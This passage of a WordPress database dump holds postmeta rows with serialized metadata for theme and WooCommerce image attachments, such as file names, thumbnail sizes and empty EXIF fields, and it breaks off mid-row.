:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"h1-img-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"h1-img-2-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51470,4288,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:546;s:6:\"height\";i:945;s:4:\"file\";s:20:\"2018/08/h8-img-5.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h8-img-5-173x300.jpg\";s:5:\"width\";i:173;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:20:\"h8-img-5-546x650.jpg\";s:5:\"width\";i:546;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:20:\"h8-img-5-546x650.jpg\";s:5:\"width\";i:546;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h8-img-5-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"h8-img-5-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51471,4290,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:23:\"2018/08/shop-img-25.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"shop-img-25-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-25-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"shop-img-25-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:23:\"shop-img-25-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"shop-img-25-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:23:\"shop-img-25-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"shop-img-25-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"shop-img-25-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-25-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"shop-img-25-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"shop-img-25-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-25-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51472,4288,'_wp_attachment_image_alt','m'),(51473,4287,'_wp_attachment_image_alt','w'),(51474,171,'_wp_attachment_image_alt','c'),(51475,46,'_wp_attachment_image_alt','d'),(51476,4289,'_wp_attachment_image_alt','m'),(51477,4290,'_wp_attachment_image_alt','d'),(51478,4291,'_wp_attached_file','2018/08/h8-img-6.jpg'),(51479,4291,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:756;s:6:\"height\";i:945;s:4:\"file\";s:20:\"2018/08/h8-img-6.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h8-img-6-240x300.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:20:\"h8-img-6-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:20:\"h8-img-6-756x650.jpg\";s:5:\"width\";i:756;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:20:\"h8-img-6-650x945.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:945;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h8-img-6-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"h8-img-6-600x750.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:750;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"h8-img-6-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"h8-img-6-600x750.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:750;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51480,4292,'_wp_attached_file','2018/07/shop-img-21.jpg'),(51481,4292,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:23:\"2018/07/shop-img-21.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"shop-img-21-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-21-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"shop-img-21-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:23:\"shop-img-21-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"shop-img-21-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:23:\"shop-img-21-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"shop-img-21-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"shop-img-21-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-21-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"shop-img-21-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"shop-img-21-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-21-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51482,4293,'_wp_attached_file','2018/07/h1-img-7.jpg'),(51483,4293,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1021;s:6:\"height\";i:473;s:4:\"file\";s:20:\"2018/07/h1-img-7.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h1-img-7-300x139.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:139;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"h1-img-7-768x356.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:356;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:20:\"h1-img-7-650x473.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:20:\"h1-img-7-650x473.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h1-img-7-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"h1-img-7-600x278.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:278;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"h1-img-7-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"h1-img-7-600x278.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:278;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51484,4294,'_wp_attached_file','2018/07/shop-img-10.jpg'),(51485,4294,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:23:\"2018/07/shop-img-10.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"shop-img-10-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"shop-img-10-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:23:\"shop-img-10-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"shop-img-10-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:23:\"shop-img-10-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"shop-img-10-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"shop-img-10-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"shop-img-10-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"shop-img-10-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51486,4295,'_wp_attached_file','2018/08/h1-img-3.jpg'),(51487,4295,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:318;s:6:\"height\";i:336;s:4:\"file\";s:20:\"2018/08/h1-img-3.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h1-img-3-284x300.jpg\";s:5:\"width\";i:284;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h1-img-3-300x336.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:336;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"h1-img-3-300x336.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:336;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51488,4296,'_wp_attached_file','2018/08/shop-img-26.jpg'),(51489,4296,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:23:\"2018/08/shop-img-26.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"shop-img-26-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-26-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"shop-img-26-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:23:\"shop-img-26-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"shop-img-26-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:23:\"shop-img-26-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"shop-img-26-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"shop-img-26-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-26-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"shop-img-26-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"shop-img-26-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-26-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51490,4295,'_wp_attachment_image_alt','m'),(51491,4291,'_wp_attachment_image_alt','m'),(51492,4293,'_wp_attachment_image_alt','m'),(51493,4292,'_wp_attachment_image_alt','w'),(51494,4294,'_wp_attachment_image_alt','e'),(51495,4296,'_wp_attachment_image_alt','v'),(51496,205,'_wp_attached_file','2018/07/h1-img-8a.jpg'),(51497,205,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:409;s:6:\"height\";i:680;s:4:\"file\";s:21:\"2018/07/h1-img-8a.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h1-img-8a-180x300.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-img-8a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:21:\"h1-img-8a-409x650.jpg\";s:5:\"width\";i:409;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:21:\"h1-img-8a-409x650.jpg\";s:5:\"width\";i:409;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h1-img-8a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-img-8a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"h1-img-8a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-img-8a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51498,205,'_wp_attachment_image_alt','m'),(51499,4297,'_wp_attached_file','2018/08/kitchen-right-img-1.jpg'),(51500,4297,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:206;s:6:\"height\";i:254;s:4:\"file\";s:31:\"2018/08/kitchen-right-img-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"kitchen-right-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"kitchen-right-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"kitchen-right-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51501,4297,'_wp_